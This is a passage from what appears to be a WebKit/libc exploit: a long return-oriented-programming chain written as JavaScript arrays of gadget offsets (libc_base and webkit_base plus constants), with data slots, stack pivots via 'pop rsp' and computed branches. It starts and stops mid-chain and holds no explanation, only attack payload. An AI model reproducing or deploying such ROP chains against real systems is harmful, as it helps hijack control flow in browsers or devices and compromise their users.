libc_base+764760, //pop rsi
ropchain+382016, //L7921
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7921:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+382072, //L7922
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7922:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+382208, //L7926
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+382192, //L7925
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7924:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L7925:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7926:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+382272, //L7927
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7927:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7929:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L7931:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+382432, //L7934
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+382416, //L7932
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7932:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7934:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+382576, //L7937
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+382544, //L7935
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+382560, //L7936
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7935:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7936:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7937:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+382664, //L7939
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L7938:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L7939:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+382720, //L7940
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7940:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7942:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+382800, //L7944
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7944:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+382880, //L7945
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7945:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7947:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+383000, //L7950
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+382984, //L7948
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L7948:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7950:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+383080, //L7951
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+383096, //L7952
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7951:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7952:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+383256, //L7956
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+383224, //L7954
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+383240, //L7955
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7953:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7954:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7955:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7956:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+383312, //L7958
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7958:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+383440, //L7960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+383456, //L7961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+383424, //L7959
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7959:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7960:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7961:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+383616, //L7965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+383584, //L7963
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+383600, //L7964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7962:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7963:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7964:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7965:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+383672, //L7967
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7967:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+383800, //L7969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+383816, //L7970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+383784, //L7968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7968:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7969:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7970:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+383976, //L7974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+383944, //L7972
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+383960, //L7973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7971:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L7972:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7973:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7974:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+384032, //L7976
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L7976:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+384160, //L7978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+384176, //L7979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+384144, //L7977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7977:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L7978:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7979:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+384256, //L7980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+384272, //L7981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7980:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7981:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+384368, //L7983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+384352, //L7982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L7982:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7983:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+384448, //L7984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7984:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7985:
db([104, 0]); // 0x68
set_gadget(libc_base+144605,); //pop rdi
//L7986:
db([104, 0]); // 0x68
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+384592, //L7987
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+384624, //L7989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+384608, //L7988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L7987:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7988:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7989:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+384792, //L7991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+384808, //L7992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+384776, //L7990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7990:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7991:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7992:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+384920, //L7994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+384968, //L7997
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+384936, //L7995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L7994:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L7995:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L7996:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L7997:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+385080, //L7998+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+385072, //L7998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L7998:
db([0, 0]); // 0x0
set_gadgets([
ropchain+385096, //L7998+24
ropchain+386568, //L7993
libc_base+764760, //pop rsi
ropchain+385136, //L7999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L7999:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8001:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+385256, //L8004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+385240, //L8002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8002:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8004:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+385432, //L8007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+385448, //L8008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+385400, //L8005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+385416, //L8006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8005:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8006:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8007:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8008:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+385544, //L8010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+385528, //L8009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8009:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8010:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8011:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8012:
db([6, 0]); // 0x6
set_gadget(libc_base+763368,); //pop rcx
//L8013:
db([6, 0]); // 0x6
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+385744, //L8015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8015:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+385800, //L8016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8016:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+385936, //L8020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+385920, //L8019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8018:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L8019:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8020:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+386000, //L8021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8021:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8023:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L8025:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+386160, //L8028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+386144, //L8026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8026:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8028:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+386304, //L8031
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+386272, //L8029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+386288, //L8030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8029:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8030:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8031:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+386392, //L8033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L8032:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L8033:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+386448, //L8034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8034:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8036:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+386528, //L8038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8038:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L7993:
libc_base+782311, //pop rsp
ropchain+393104, //L7904
//L7708:
libc_base+764760, //pop rsi
ropchain+386624, //L8039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L8039:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8041:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+386744, //L8044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+386728, //L8042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8042:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8044:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+386920, //L8047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+386936, //L8048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+386888, //L8045
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+386904, //L8046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8045:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8046:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8047:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8048:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+387032, //L8050
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+387016, //L8049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8049:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8050:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8051:
db([8, 0]); // 0x8
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8052:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L8053:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+387312, //L8055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+387328, //L8056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+387296, //L8054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8054:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8055:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8056:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+387440, //L8058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+387488, //L8061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+387456, //L8059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8058:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8059:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8060:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8061:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+387600, //L8062+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+387592, //L8062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L8062:
db([0, 0]); // 0x0
set_gadgets([
ropchain+387616, //L8062+24
ropchain+387752, //L8057
libc_base+759608 //pop rax
]);
//L8063:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8064:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L8065:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+782311, //pop rsp
ropchain+387872, //L8066
//L8057:
libc_base+759608 //pop rax
]);
//L8067:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L8068:
db([9, 0]); // 0x9
set_gadget(libc_base+763368,); //pop rcx
//L8069:
db([9, 0]); // 0x9
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
//L8066:
libc_base+764760, //pop rsi
ropchain+387912, //L8071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L8071:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
